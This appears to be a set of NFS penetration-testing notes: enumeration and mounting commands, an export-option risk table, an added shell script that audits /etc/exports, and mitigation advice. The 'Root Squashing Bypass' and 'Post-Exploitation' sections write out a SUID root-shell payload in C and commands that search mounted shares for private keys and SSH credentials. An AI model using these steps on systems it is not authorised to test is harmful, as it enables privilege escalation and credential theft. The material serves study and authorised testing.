NFS Pentesting Notes
Protocol Overview
Basic Information
Port: TCP/UDP 2049 (NFS), TCP/UDP 111 (RPC)
Protocol Type: Application layer
Purpose: Remote file system mounting and access
Security: Relies on Unix-style permissions and RPC authentication
Protocol Versions
NFSv2
UDP-based, basic operations
Basic Unix permissions
NFSv3
TCP/UDP, larger files, async writes
AUTH_SYS, better error handling
NFSv4
TCP only, stateful, single port
Kerberos, ACLs, encryption
NFSv4.1
Parallel NFS (pNFS)
Enhanced security features
Initial Enumeration
Port Scanning
# Basic NFS scan
nmap -p111,2049 -sV <target>
# Aggressive scan with scripts
nmap -p111,2049 -sV -sC -A <target>
# All NFS scripts
nmap -p111,2049 --script nfs* <target>
RPC Information Gathering
# Using rpcinfo
rpcinfo -p <target>
# Using showmount
showmount -e <target>
# Using rpcclient (Samba's MS-RPC client: only useful if the host also exposes SMB/MSRPC; it does not speak the ONC RPC that NFS uses)
rpcclient -N -U "" <target>
Share Operations
Listing Shares
# Using showmount
showmount -e <target>
# Using rpcinfo
rpcinfo -p <target> | grep nfs
# Using Nmap
nmap -sV --script=nfs-ls,nfs-statfs,nfs-showmount <target>
Mounting Shares
# Create mount point
mkdir /tmp/mount
# Basic mount
mount -t nfs <target>:/share /tmp/mount
# Mount with specific version
mount -t nfs -o vers=3 <target>:/share /tmp/mount
# Mount with NLM file locking disabled (nolock), e.g. when the lock manager is not reachable
mount -t nfs -o vers=3,nolock <target>:/share /tmp/mount
# Force UDP mount
mount -t nfs -o vers=2,udp <target>:/share /tmp/mount
Common NSE Scripts
# Discovery scripts
nmap -p111,2049 --script nfs-ls <target>
nmap -p111,2049 --script nfs-showmount <target>
nmap -p111,2049 --script nfs-statfs <target>
# Run all NFS scripts
nmap -p111,2049 --script nfs* <target>
Quick Reference Commands
# Quick Enumeration
nmap -sV --script=nfs* -p111,2049 <target>
showmount -e <target>
rpcinfo -p <target>
# Quick Mount
mkdir /tmp/mount
mount -t nfs <target>:/share /tmp/mount
# Quick Permission Check
ls -la /tmp/mount
find /tmp/mount -perm -4000 -type f
# Quick Cleanup
umount /tmp/mount
rm -rf /tmp/mount
Access Control Bypass
Root Squashing Bypass
# Check the export options on the server (no_root_squash is not visible from the client side)
cat /etc/exports
# Create payload as root (the includes are needed for setuid() and system() to compile cleanly)
cat > shell.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>
int main(void) { setuid(0); system("/bin/bash"); return 0; }
EOF
# Compile
gcc shell.c -o shell
# Set SUID bit
chmod +s shell
# Execute from mounted share
./shell
Permission Analysis
# List files with permissions
ls -la /tmp/mount
# Find SUID binaries
find /tmp/mount -perm -4000 -type f
# Find world-writable files
find /tmp/mount -perm -2 -type f
Configuration Files
Server Configuration
Main config: /etc/exports
RPC settings: /etc/default/nfs-kernel-server
Systemd unit: /lib/systemd/system/nfs-kernel-server.service
Client Configuration
Mount settings: /etc/fstab
RPC settings: /etc/default/nfs-common
Systemd unit: /lib/systemd/system/nfs-client.target
Export Options
Critical Settings
Option            Risk    Effect
no_root_squash    High    Allows root access (client uid 0 is not mapped to nobody)
insecure          High    Allows connections from source ports > 1024
rw                Medium  Allows write access
sync              Low     Synchronous write operations
async             Medium  Asynchronous write operations
no_subtree_check  Low     Disables directory (subtree) verification
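To audit these settings on a server you administer, here is an added example that is not part of the original notes: a POSIX shell function, audit_exports (a name assumed here), that reads an exports(5)-style file on stdin and prints one tab-separated finding per line with the risk levels from the table above. It also catches the classic mistake of a space between the client and its option list, which makes those options apply to every client. The sample exports file is constructed for the demo.

```shell
#!/bin/sh
# audit_exports (assumed helper name): read exports(5) text on stdin, print
# path, client, level, message (tab-separated) for each risky option.
# A missing sec= option is reported as LOW because AUTH_SYS trusts the
# uid/gid supplied by the client.
audit_exports() {
    awk '
    function report(p, h, lvl, msg) { print p "\t" h "\t" lvl "\t" msg }
    {
        sub("#.*", "")                     # drop comments; NF is recomputed
        if (NF < 2) next
        path = $1
        for (i = 2; i <= NF; i++) {        # each remaining field is client(options)
            host = $i; opts = ""
            if (match($i, /\(.*\)$/)) {
                host = substr($i, 1, RSTART - 1)
                opts = substr($i, RSTART + 1, RLENGTH - 2)
            }
            if (host == "") {              # "client (opts)": the space detaches the options
                host = "*"
                report(path, host, "HIGH", "option list not attached to a client applies to every client")
            }
            wild = (host ~ /\*/); rw = 0; sec = 0
            n = split(opts, o, ",")
            for (j = 1; j <= n; j++) {
                if (o[j] == "no_root_squash") report(path, host, "HIGH", "no_root_squash: client root keeps uid 0")
                else if (o[j] == "insecure") report(path, host, "HIGH", "insecure: source ports above 1024 accepted")
                else if (o[j] == "async") report(path, host, "MEDIUM", "async: acknowledged writes can be lost")
                else if (o[j] == "no_subtree_check") report(path, host, "LOW", "no_subtree_check: parent directory check disabled")
                else if (o[j] == "rw") rw = 1
                else if (o[j] ~ /^sec=/) sec = 1
            }
            if (rw) { lvl = wild ? "HIGH" : "MEDIUM"; msg = wild ? "rw: write access for a wildcard client" : "rw: write access"
                      report(path, host, lvl, msg) }
            if (!sec) report(path, host, "LOW", "no sec= option: AUTH_SYS only, client uid/gid trusted")
        }
    }'
}

# Constructed sample exports file (not taken from any real host).
SAMPLE_EXPORTS='# constructed sample
/export/public  *(ro,sync,no_subtree_check)
/export/home    10.0.0.0/24(rw,sync,no_root_squash,insecure)
/export/backup  10.0.0.5 (rw,async)
/export/krb     10.0.0.0/24(rw,sec=krb5p,sync)'

# Number of findings at a given level (HIGH, MEDIUM or LOW) for the sample.
count_level() { printf '%s\n' "$SAMPLE_EXPORTS" | audit_exports | awk -F'\t' -v l="$1" '$3 == l { c++ } END { print c + 0 }'; }

printf '%s\n' "$SAMPLE_EXPORTS" | audit_exports
```

Run it against a real file with `audit_exports < /etc/exports`; the third line of the sample shows why exportfs warns about a stray space, since `(rw,async)` ends up exported to every client.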
Common Vulnerabilities
Configuration Issues
no_root_squash enabled
Insecure export options
World-readable sensitive files
Improper access controls
Version-specific
NFSv2/v3 lack encryption
RPC vulnerabilities
Authentication bypasses
Implementation Issues
Race conditions
Buffer overflows
Arbitrary file access
Post-Exploitation
Information Gathering
# List all files recursively
ls -laR /tmp/mount
# Find sensitive files
find /tmp/mount -name "*.key" -o -name "*.pem" -o -name "*.conf"
# Check for hidden files
find /tmp/mount -name ".*"
# Look for user data
find /tmp/mount -name "id_rsa" -o -name ".ssh"
Privilege Escalation
# Check mount options
mount | grep nfs
# Look for SUID binaries
find /tmp/mount -perm -4000 -type f
# Check write permissions
find /tmp/mount -writable -type f
# Create SUID shell (if no_root_squash)
gcc -o shell shell.c
chmod +s shell
Common Status Codes
NFSERR_PERM    Not owner
NFSERR_NOENT   No such file/directory
NFSERR_IO      I/O error
NFSERR_ACCES   Permission denied
NFSERR_EXIST   File exists
Best Practices for Pentesting
Initial Reconnaissance
Identify NFS version
List available shares
Check mount permissions
Analyze export options
Deep Enumeration
Mount all accessible shares
Check file permissions
Look for sensitive data
Identify misconfigurations
Documentation
Record available shares
Note mount options
Document file permissions
Save vulnerability evidence
Risk Assessment
Evaluate export options
Check for sensitive data exposure
Assess potential for privilege escalation
Consider network exposure
Common Attack Vectors
Root squashing bypass
File permission abuse
SUID binary creation
Sensitive file access
Mitigation Recommendations
Enable root squashing
Use restrictive export options
Implement proper access controls
Enable encryption (NFSv4)
Regular security audits
Network segmentation